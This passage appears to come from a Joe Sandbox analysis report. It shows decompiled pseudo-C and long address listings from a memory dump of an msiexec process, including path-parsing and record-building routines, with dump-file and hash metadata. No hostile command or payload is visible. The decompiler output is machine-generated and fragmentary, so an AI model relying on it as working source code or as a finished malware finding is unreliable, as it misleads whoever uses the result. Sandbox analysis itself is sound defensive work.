														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04D4F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04D4F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04D4F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04D4FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04D4FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04D4F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04D4F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04DD4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04D5D130(_t427, _t494, _t511);
				}
			}










































































                              0x04dd5ba5
                              0x04dd5baa
                              0x04dd5baf
                              0x04dd5bb4
                              0x04dd5bb6
                              0x04dd5bbc
                              0x04dd5bbe
                              0x04dd5bc4
                              0x04dd5bcd
                              0x04dd5bd3
                              0x04dd5bd6
                              0x04dd5bdc
                              0x04dd5be0
                              0x04dd5be3
                              0x04dd5beb
                              0x04dd5bf2
                              0x04dd5bf8
                              0x04dd5bfe
                              0x04dd5c04
                              0x04dd5c0e
                              0x04dd5c18
                              0x04dd5c1f
                              0x04dd5c25
                              0x04dd5c2a
                              0x04dd5c2c
                              0x04dd5c32
                              0x04dd5c3a
                              0x04dd5c3f
                              0x04dd5c42
                              0x04dd5c48
                              0x04dd5c5b
                              0x04dd5c5b
                              0x04dd5c2c
                              0x04dd5cb7
                              0x04dd5cb9
                              0x04dd5cbf
                              0x04dd5cc2
                              0x04dd5cca
                              0x04dd5ccb
                              0x04dd5ccb
                              0x04dd5cd1
                              0x04dd5cd7
                              0x04dd5cda
                              0x04dd5ce1
                              0x04dd5ce4
                              0x04dd5ce7
                              0x04dd5ced
                              0x04dd5cf3
                              0x04dd5cf9
                              0x04dd5cff
                              0x04dd5d08
                              0x04dd5d0a
                              0x04dd5d0e
                              0x04dd5d10
                              0x00000000
                              0x00000000
                              0x04dd5d16
                              0x04dd5d1a
                              0x00000000
                              0x00000000
                              0x04dd5d20
                              0x04dd5d22
                              0x04dd5d25
                              0x04dd5d2f
                              0x04dd5d2f
                              0x04dd5d33
                              0x04dd5d3d
                              0x04dd5d49
                              0x04dd5d4b
                              0x00000000
                              0x00000000
                              0x04dd5d5a
                              0x04dd5d5d
                              0x04dd5d60
                              0x00000000
                              0x00000000
                              0x04dd5d66
                              0x04dd5d69
                              0x00000000
                              0x00000000
                              0x04dd5d6f
                              0x04dd5d6f
                              0x04dd5d73
                              0x04dd5d79
                              0x04dd5d7f
                              0x04dd5d86
                              0x04dd5d95
                              0x04dd5d98
                              0x04dd5dba
                              0x04dd5dcb
                              0x04dd5dce
                              0x04dd5dd3
                              0x04dd5dd6
                              0x04dd5dd8
                              0x04dd5de6
                              0x04dd5dec
                              0x04dd5dee
                              0x04dd5df1
                              0x04dd5df3
                              0x04dd635a
                              0x04dd635a
                              0x00000000
                              0x04dd635a
                              0x04dd5dfe
                              0x04dd5e02
                              0x04dd5e05
                              0x04dd5e07
                              0x04dd5e10
                              0x04dd5e13
                              0x04dd5e1b
                              0x04dd5e1c
                              0x04dd5e21
                              0x04dd5e22
                              0x04dd5e23
                              0x04dd5e25
                              0x04dd5e2a
                              0x04dd5e2c
                              0x04dd5e2e
                              0x04dd5e36
                              0x04dd5e39
                              0x04dd5e42
                              0x04dd5e47
                              0x04dd5e4d
                              0x04dd5e54
                              0x04dd5e54
                              0x04dd5e54
                              0x04dd5e2e
                              0x04dd5e5c
                              0x04dd5e5f
                              0x04dd5e62
                              0x04dd5e64
                              0x04dd5e6b
                              0x04dd5e70
                              0x04dd5e7a
                              0x04dd5e7a
                              0x04dd5e7a
                              0x04dd5e6b
                              0x04dd5e7e
                              0x04dd5e7f
                              0x04dd5e7f
                              0x04dd5e81
                              0x04dd5e87
                              0x04dd5e8b
                              0x04dd5e8c
                              0x04dd5e8c
                              0x04dd5e8c
                              0x04dd5e9a
                              0x04dd5e9c
                              0x04dd5ea2
                              0x04dd5ea6
                              0x04dd5f50
                              0x04dd5f50
                              0x04dd5f57
                              0x04dd5f66
                              0x04dd5f66
                              0x04dd5f66
                              0x04dd5f68
                              0x04dd5f6a
                              0x04dd63d0
                              0x00000000
                              0x04dd5f70
                              0x04dd5f70
                              0x04dd5f91
                              0x04dd5f9c
                              0x04dd5f9e
                              0x04dd5fa4
                              0x04dd5fa6
                              0x04dd638c
                              0x04dd6392
                              0x04dd63a1
                              0x04dd63a7
                              0x04dd63af
                              0x04dd63af
                              0x04dd63bd
                              0x04dd63d8
                              0x00000000
                              0x04dd63d8
                              0x04dd5fac
                              0x04dd5fb2
                              0x04dd5fb4
                              0x04dd5fbd
                              0x04dd5fc6
                              0x04dd5fce
                              0x04dd5fd4
                              0x04dd5fdc
                              0x04dd5fec
                              0x04dd5fed
                              0x04dd5fee
                              0x04dd5fef
                              0x04dd5ff9
                              0x04dd5ffa
                              0x04dd5ffb
                              0x04dd5ffc
                              0x04dd6000
                              0x04dd6004
                              0x04dd6012
                              0x04dd6012
                              0x04dd6018
                              0x04dd6019
                              0x04dd601a
                              0x04dd601b
                              0x04dd601c
                              0x04dd6020
                              0x04dd6059
                              0x04dd605c
                              0x04dd6061
                              0x04dd6061
                              0x04dd6022
                              0x04dd6022
                              0x04dd6022
                              0x04dd6025
                              0x04dd602a
                              0x04dd602b
                              0x04dd6031
                              0x04dd6037
                              0x04dd6038
                              0x04dd603e
                              0x04dd6048
                              0x04dd6049
                              0x04dd604a
                              0x04dd604b
                              0x04dd604c
                              0x04dd604d
                              0x04dd6053
                              0x04dd6054
                              0x04dd6054
                              0x04dd6062
                              0x04dd6065
                              0x04dd6067
                              0x04dd606a
                              0x04dd6070
                              0x04dd6075
                              0x04dd6076
                              0x04dd6081
                              0x04dd6087
                              0x04dd6095
                              0x04dd6099
                              0x04dd609e
                              0x04dd60a4
                              0x04dd60ae
                              0x04dd60b0
                              0x04dd60b3
                              0x04dd60b6
                              0x04dd60b8
                              0x04dd60ba
                              0x04dd60ba
                              0x04dd60ba
                              0x04dd60ba
                              0x04dd60be
                              0x04dd60c0
                              0x04dd60c5
                              0x04dd60c5
                              0x04dd60c5
                              0x04dd60c6
                              0x04dd60cd
                              0x04dd6114
                              0x04dd60cf
                              0x04dd60cf
                              0x04dd60d4
                              0x04dd60d5
                              0x04dd60da
                              0x04dd60db
                              0x04dd60e1
                              0x04dd60e2
                              0x04dd60e8
                              0x04dd60f8
                              0x04dd60fd
                              0x04dd60fe
                              0x04dd6102
                              0x04dd6104
                              0x04dd6107
                              0x04dd6109
                              0x04dd610b
                              0x04dd610b
                              0x04dd610b
                              0x04dd610b
                              0x04dd610f
                              0x04dd610f
                              0x04dd6117
                              0x04dd611a
                              0x04dd611f
                              0x04dd6125
                              0x04dd6134
                              0x04dd6139
                              0x04dd613f
                              0x04dd6146
                              0x04dd6148
                              0x04dd614b
                              0x04dd614d
                              0x04dd614f
                              0x04dd614f
                              0x04dd614f
                              0x04dd614f
                              0x04dd6153
                              0x04dd6159
                              0x04dd6159
                              0x04dd615c
                              0x04dd6163
                              0x04dd6169
                              0x04dd616c
                              0x04dd6172
                              0x04dd6181
                              0x04dd6186
                              0x04dd6187
                              0x04dd618b
                              0x04dd6191
                              0x04dd6195
                              0x04dd61a3
                              0x04dd61bb
                              0x04dd61c0
                              0x04dd61c3
                              0x04dd61cc
                              0x04dd61d0
                              0x04dd61dc
                              0x04dd61de
                              0x04dd61e1
                              0x04dd61e4
                              0x04dd61e6
                              0x04dd61e8
                              0x04dd61e8
                              0x04dd61e8
                              0x04dd61e8
                              0x04dd61e6
                              0x04dd61ec
                              0x04dd61f3
                              0x04dd6203
                              0x04dd6209
                              0x04dd620a
                              0x04dd6216
                              0x04dd621d
                              0x04dd6227
                              0x04dd6241
                              0x04dd6246
                              0x04dd624c
                              0x04dd6257
                              0x04dd6259
                              0x04dd625c
                              0x04dd625e
                              0x04dd6260
                              0x04dd6260
                              0x04dd6260
                              0x04dd6260
                              0x04dd625e
                              0x04dd6264
                              0x04dd6267
                              0x04dd6269
                              0x04dd6315
                              0x04dd6315
                              0x04dd631b
                              0x04dd631e
                              0x04dd6324
                              0x04dd6327
                              0x04dd632f
                              0x04dd6330
                              0x04dd6333
                              0x04dd633a
                              0x04dd633c
                              0x04dd6335
                              0x04dd6335
                              0x04dd6335
                              0x04dd633f
                              0x04dd6342
                              0x04dd634c
                              0x04dd6352
                              0x04dd6355
                              0x04dd6355
                              0x04dd6359
                              0x00000000
                              0x04dd626f
                              0x04dd6275
                              0x04dd6275
                              0x04dd6278
                              0x04dd627e
                              0x04dd627e
                              0x04dd6281
                              0x04dd6287
                              0x04dd628d
                              0x04dd6298
                              0x04dd629c
                              0x04dd62a2
                              0x04dd629e
                              0x04dd629e
                              0x04dd629e
                              0x04dd62a7
                              0x04dd62a7
                              0x04dd62aa
                              0x04dd62b0
                              0x04dd62f0
                              0x04dd62f0
                              0x04dd62f2
                              0x04dd62f8
                              0x04dd62fd
                              0x04dd62b2
                              0x04dd62b2
                              0x04dd62b2
                              0x04dd62b5
                              0x04dd62dd
                              0x04dd62e2
                              0x04dd62e5
                              0x04dd62b7
                              0x04dd62b8
                              0x04dd62bb
                              0x04dd62bd
                              0x04dd62c0
                              0x04dd62c4
                              0x04dd62cd
                              0x04dd62cd
                              0x04dd62c0
                              0x04dd62bb
                              0x04dd62b5
                              0x04dd6302
                              0x04dd6303
                              0x04dd6305
                              0x04dd6305
                              0x04dd6305
                              0x04dd630c
                              0x04dd630c
                              0x00000000
                              0x04dd627e
                              0x04dd6269
                              0x04dd5eac
                              0x04dd5ebb
                              0x04dd5ebe
                              0x04dd5ecb
                              0x04dd5ecb
                              0x04dd5ece
                              0x04dd5ece
                              0x04dd5ed4
                              0x04dd5ed7
                              0x04dd5ed9
                              0x04dd5edb
                              0x04dd5edb
                              0x04dd5ee1
                              0x04dd5ee1
                              0x04dd5ee3
                              0x04dd5f20
                              0x04dd5f20
                              0x04dd5ee5
                              0x04dd5ee5
                              0x04dd5ee5
                              0x04dd5ee8
                              0x04dd5f11
                              0x04dd5f18
                              0x04dd5eea
                              0x04dd5eea
                              0x04dd5eed
                              0x04dd5ef2
                              0x04dd5ef8
                              0x04dd5efb
                              0x04dd5f0a
                              0x04dd5f0a
                              0x04dd5eed
                              0x04dd5ee8
                              0x04dd5f22
                              0x04dd5f28
                              0x00000000
                              0x00000000
                              0x04dd5f30
                              0x04dd5f31
                              0x04dd5f37
                              0x04dd5f3a
                              0x04dd5f3d
                              0x04dd5f44
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04dd5f46
                              0x04dd5f48
                              0x04dd5f4d
                              0x00000000
                              0x04dd5f4d
                              0x04dd5dda
                              0x04dd5ddf
                              0x00000000
                              0x04dd5ddf
                              0x04dd5dd8
                              0x04dd5da7
                              0x04dd5da9
                              0x04dd5dac
                              0x04dd5dae
                              0x00000000
                              0x04dd5db4
                              0x04dd5db4
                              0x00000000
                              0x04dd5db4
                              0x04dd5dae
                              0x04dd5d88
                              0x04dd5d8d
                              0x04dd6363
                              0x04dd6369
                              0x04dd636a
                              0x04dd6370
                              0x04dd6372
                              0x04dd637a
                              0x04dd637b
                              0x04dd637d
                              0x00000000
                              0x00000000
                              0x04dd637f
                              0x04dd6385
                              0x00000000
                              0x04dd6385
                              0x04dd5d38
                              0x04dd5d3b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04dd5d3b
                              0x04dd5d27
                              0x04dd5d29
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04dd6360
                              0x00000000
                              0x04dd6360
                              0x04dd5c10
                              0x04dd5c10
                              0x04dd63da
                              0x04dd63e5
                              0x04dd63e5

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 92071b0b8688cab0de1eadac7180a5bdb1dedd666e2ee853e696f4d08e3020db
                              • Instruction ID: 2b1f5155066a671b31a99cdd3bc1eb16e4b53d205793864ed2a486277f1e8122
                              • Opcode Fuzzy Hash: 92071b0b8688cab0de1eadac7180a5bdb1dedd666e2ee853e696f4d08e3020db
                              • Instruction Fuzzy Hash: 8F424D75A00229DFDB24CF68C890BA9B7B1FF45304F1481AAD94DEB241E775E985CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D24120 Relevance: .4, Instructions: 444COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 92%
                              			E04D24120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4dfd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04D3F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04D26E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04D24620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04D26E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04D245F8))) {
												case 0:
													_v568 = 0x4ce1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4ce11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04D24620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04D4F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
